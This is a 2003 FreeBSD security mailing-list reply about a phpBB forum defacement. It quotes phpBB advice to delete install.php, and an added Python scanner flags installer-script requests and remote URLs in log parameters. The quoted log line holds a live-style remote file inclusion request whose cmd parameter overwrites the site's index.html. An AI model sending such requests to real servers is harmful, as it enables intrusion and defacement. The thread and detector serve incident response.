Date:      Fri, 07 Nov 2003 13:48:42 -0600
From:      "Kevin D. Kinsey, DaleCo, S.P." <kdk@daleco.biz>
To:        Miha Nedok <mike@voyager.unix-systems.net>
Cc:        freebsd-security@freebsd.org
Subject:   Re: hack ? - urgent - false FreeBSD alarm
Message-ID:  <3FABF71A.7000903@daleco.biz>
In-Reply-To: <20031107132650.H19165@voyager.zrcalo.si>
References:  <20031107125529.R19165@voyager.zrcalo.si> <3FAB8B3A.7020908@remotelab.org> <20031107132650.H19165@voyager.zrcalo.si>

Miha Nedok wrote:

>Hi !
>
>It is phpBB related. I found in logs:
>200.211.35.130 - - [07/Nov/2003:11:27:01 +0100] "GET
>/forum/install.php?phpbb_root_dir=http://www.creatividade.hpg.com.br/&cmd=cd%20..;cd%20..;cd%20www.site-
>name.si;echo%20IR4DEX%20ownz%20you%20FreeBSD%20-%20contato:%20ir4dex@hotmail.com%20>%20index.html
>HTTP/1.1" 200 904 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
>
>
>
>I just did chmod 000 `find -name 'install.php'` for a workaround.
>
>Apache is latest: Nov  3 18:08 apache+mod_ssl-1.3.28+2.8.15_2 .
>
>
>
>-Miha
>
>
>
>  
>
 From ~/phpp/docs/Install.html:


    _6. Important post-Install tasks for all installation methods_

Once you have successfully installed phpBB 2.0.0 you *MUST* ensure you 
remove install.php, upgrade.php and update_to_FINAL.php files. Leaving 
these in place is a _very serious potential security issue_. 
Additionally you may delete the db/schemas, docs/ and contrib/ 
directories if you wish.
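
An added example (not part of the original message, and not phpBB or FreeBSD code): a log check for the request pattern quoted above, flagging requests to the three installer scripts and any query parameter whose value is a remote URL. It generalizes beyond `phpbb_root_dir` to any parameter name; the sample lines, hosts and label strings are constructed, and hits on parameters that legitimately carry URLs need triage.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Scripts the phpBB install notes quoted above say must be removed.
INSTALLER_FILES = {"install.php", "upgrade.php", "update_to_final.php"}
# Apache common/combined log prefix: host ident user [time] "request" status
LOG_RE = re.compile(r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<target>.*) HTTP/[\d.]+" (?P<status>\d{3}) ')
REMOTE_VALUE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

def inspect_line(line):
    """Return a finding dict for a request worth triaging, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    reasons = []
    if url.path.rsplit("/", 1)[-1].lower() in INSTALLER_FILES:
        # A 2xx answer means the script is still on disk and executable.
        served = m.group("status").startswith("2")
        reasons.append("installer-script-served" if served else "installer-script-requested")
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        # parse_qsl percent-decodes, so an encoded "http%3A%2F%2F" is caught too.
        if REMOTE_VALUE.match(value):
            reasons.append("remote-url-in-parameter:" + name)
    if not reasons:
        return None
    return {"host": m.group("host"), "time": m.group("time"),
            "path": url.path, "reasons": reasons}

def scan(lines):
    """Inspect every line and return the findings in log order."""
    return [f for f in map(inspect_line, lines) if f]

# Constructed sample lines (documentation addresses and hosts), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [07/Nov/2003:11:27:01 +0100] "GET /forum/install.php'
    '?phpbb_root_dir=http://remote.example/&mode=test HTTP/1.1" 200 904 "-" "-"',
    '192.0.2.11 - - [07/Nov/2003:11:30:12 +0100] "GET /forum/upgrade.php HTTP/1.1" 404 210 "-" "-"',
    '192.0.2.12 - - [07/Nov/2003:11:31:40 +0100] "GET /forum/viewtopic.php?t=42 HTTP/1.1" 200 5120 "-" "-"',
    '192.0.2.13 - - [07/Nov/2003:11:32:05 +0100] "GET /index.php?page=http%3A%2F%2Fremote.example%2Fx HTTP/1.1" 200 100 "-" "-"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding["host"], finding["time"], finding["path"], ", ".join(finding["reasons"]))
```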




